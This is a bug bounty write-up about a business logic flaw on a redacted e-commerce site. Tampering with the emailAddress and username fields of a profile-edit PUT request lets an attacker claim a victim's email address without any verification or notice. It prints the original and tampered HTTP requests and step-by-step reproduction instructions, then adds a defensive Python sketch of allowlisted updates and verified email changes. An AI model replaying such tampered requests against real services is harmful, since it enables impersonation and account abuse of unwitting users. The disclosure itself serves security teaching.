Disrupting an Application’s Registration Process in 10 mins
2021-12-15 02:34:20 Author: infosecwriteups.com (view original) Reads: 18 Bookmarks

Karan Arora

So, as usual, this writeup is divided into three sections:

  1. Introduction.
  2. Vulnerability Description.
  3. Steps to reproduce.

What are business logic vulnerabilities?

Business logic vulnerabilities are flaws in the design and implementation of an application that allow an attacker to elicit unintended behaviour. This potentially enables attackers to manipulate legitimate functionality to achieve a malicious goal. These flaws are generally the result of failing to anticipate unusual application states that may occur and, consequently, failing to handle them safely.

Read more about it at https://portswigger.net/web-security/logic-flaws

So let's start with the introduction of our target. The target I was hunting on is an e-commerce website, which has all the basic functionality that an e-commerce store should have.

Target functionality: 2FA, login and signup, profile editing, carts, checkout, etc.

In this writeup, we are focusing on the profile editing functionality, as that is where I found the business logic flaw.

Let me ask you, what are the basic functions that a developer includes on a profile editing page?

Answer: the ability for a user to change their email address, edit their name and change other basic information.

Now that we know the basics and have a scope of functionality to test, let's start with our attack methodology.

The application let me change the basic info in my profile but somehow didn't give me any permission to change my email address. And I was like, that's kinda SUS.

So I just wanted to see the request it made when I updated basic things like my name. (Explained in detail later in the writeup.)

I intercepted that particular request, and what I saw was kinda surprising.

Even though I only wanted to change my name, the request sent all the other profile data with it, including my current email (in the emailAddress and username parameters). Since I was not allowed to change my email address normally, I thought: why not change the email address in this particular request by updating the emailAddress and username parameters?

I updated the parameters with the victim's email address and, to my surprise, it WORKED. Keep in mind that I didn't stop here, hehe.

The email address was updated successfully. Now I just had to expand the impact of this vulnerability, which I have shown in my Steps to reproduce.

1) Make an account on https://www.****.in/en/ and verify it.
2) Visit the edit profile page of https://www.****.in/en/ and, for the sake of this attack, edit anything on the edit profile page.
3) Now click the save changes button and intercept that request in Burp Suite.

The intercepted request will look like this:

PUT /useraccounts/users/5f53963ea829f23e7dfa2fc3 HTTP/1.1
Host: dl****.execute-api.ap-south-1.amazonaws.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.*****.in/
Authorization: Bearer eyJhbG****dhMjEyNTM1M2QxIiwiY2xpZW50X2lkIjoidGVzdCJ9.2xHW9goHxG08dw28q-1xHyyXWvevelTJ6E-IU0_yh50
Content-Type: application/json
Content-Length: 939
Origin: https://www.****.in
Connection: close

{"id":"5f53963ea829f23e7***","creationDate":***,"modifyDate":1599316219***,"firstName":"Karan","lastName":"Arora","mobileNo":"***943914","emailAddress":"adversaryc***@gmail.com","dateOfBirth":1016562600000,"gender":"male","shorterTestTaken":false,"longerTestTaken":false,"alternateEmailAddress":"","careerIntentId":"5ea9e91bdd50a63d28c5ca9b","lang":"en","userEnrollments":{"id":null,"userId":"5f53963ea829f23e7dfa2fc3","onlineTestEnrollments":{"categories":[],"tests":[]}},"appliedforWonk":false,"isDOBUpdated":true,"username":"adversaryc***@gmail.com"}

Now change the highlighted parameters (emailAddress and username) to the victim's email address.

Victim's email address: karn***@gmail.com

Changed request:

PUT /useraccounts/users/5f53963ea829f23e7dfa2fc3 HTTP/1.1
Host: dl****.execute-api.ap-south-1.amazonaws.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.*****.in/
Authorization: Bearer eyJhbG****dhMjEyNTM1M2QxIiwiY2xpZW50X2lkIjoidGVzdCJ9.2xHW9goHxG08dw28q-1xHyyXWvevelTJ6E-IU0_yh50
Content-Type: application/json
Content-Length: 939
Origin: https://www.****.in
Connection: close

{"id":"5f53963ea829f23e7***","creationDate":***,"modifyDate":1599316219***,"firstName":"Karan","lastName":"Arora","mobileNo":"***943914","emailAddress":"karn***@gmail.com","dateOfBirth":1016562600000,"gender":"male","shorterTestTaken":false,"longerTestTaken":false,"alternateEmailAddress":"","careerIntentId":"5ea9e91bdd50a63d28c5ca9b","lang":"en","userEnrollments":{"id":null,"userId":"5f53963ea829f23e7dfa2fc3","onlineTestEnrollments":{"categories":[],"tests":[]}},"appliedforWonk":false,"isDOBUpdated":true,"username":"karn***@gmail.com"}

Forward this request. The account will now be updated, and you can see the changes on the profile page.

Note that no notification is sent to the victim's email address, which acts as a bonus for the attacker and helped me increase the impact of the vulnerability.

To double-check that the changes had taken place, I logged out and tried logging in with the attacker's original email adver***@gmail.com (this was another vulnerability that was later added to my overall reward, as the attacker was able to log in with his old email address even after updating it to the new one).

Go to the profile section and you will see the victim's email address karn***@gmail.com as the default instead of the attacker's, and from now on any changes the attacker performs on this account will be logged as performed by karn***@gmail.com.
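The root cause above is a profile PUT that trusts every field the client echoes back, including the login identifiers, with no notice to the old address and no invalidation of the old login name. The following is an added example of how a server could handle that same update safely; it is not the target's code, and the field names are taken from the request body shown above while the function names and flow are assumptions:

```python
import hmac
import secrets

# Fields a user may change through the generic profile PUT.
SELF_EDITABLE = {"firstName", "lastName", "mobileNo", "dateOfBirth",
                 "gender", "lang", "alternateEmailAddress"}
# Login identifiers: never taken from the PUT body; changed only via the verified flow.
IDENTITY_FIELDS = {"emailAddress", "username"}


def apply_profile_update(stored, body):
    """Apply the client's PUT body (a dict) to the stored profile via an allowlist.

    Returns (updated_profile, audit_events). Identity and server-managed fields
    (id, creationDate, userEnrollments, ...) are ignored even if echoed back;
    an attempt to change an identity field is recorded for alerting.
    """
    updated = dict(stored)
    events = []
    for key, value in body.items():
        if key in SELF_EDITABLE:
            updated[key] = value
        elif key in IDENTITY_FIELDS and value != stored.get(key):
            events.append(f"rejected_identity_change:{key}")
    return updated, events


def request_email_change(stored, new_email):
    """Start a verified email change: a token goes to the NEW address and a
    notice to the OLD one, so a takeover attempt is no longer silent."""
    token = secrets.token_urlsafe(32)
    pending = {"userId": stored["id"], "newEmail": new_email, "token": token}
    outbound = [("verify", new_email, token),
                ("notice", stored["emailAddress"], new_email)]
    return pending, outbound


def confirm_email_change(stored, pending, presented_token):
    """Swap BOTH login identifiers only on a matching token (constant-time
    compare), so the old address stops working as a login name immediately."""
    if pending["userId"] != stored["id"] or not hmac.compare_digest(
            pending["token"], presented_token):
        return stored, False
    updated = dict(stored, emailAddress=pending["newEmail"],
                   username=pending["newEmail"])
    return updated, True


def login_identifiers(profile):
    """Identifiers a login attempt may match; the old email must not linger here."""
    return {profile["emailAddress"], profile["username"]}
```

The `rejected_identity_change` events are the detection hook: a burst of them from one session is exactly the request tampering this writeup describes.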

And that’s how I disrupted their application’s whole account registration functionality.

Twitter ⬇

https://twitter.com/Itskaranxa

IF YOU FELT THIS WAS WORTH YOUR TIME THEN

SUBSCRIBE FOR MORE. STAY CURIOUS !!


Article source: https://infosecwriteups.com/disrupting-an-applications-registration-process-in-10-mins-eab63cffd5eb?source=rss----7b722bfd1b8d--bug_bounty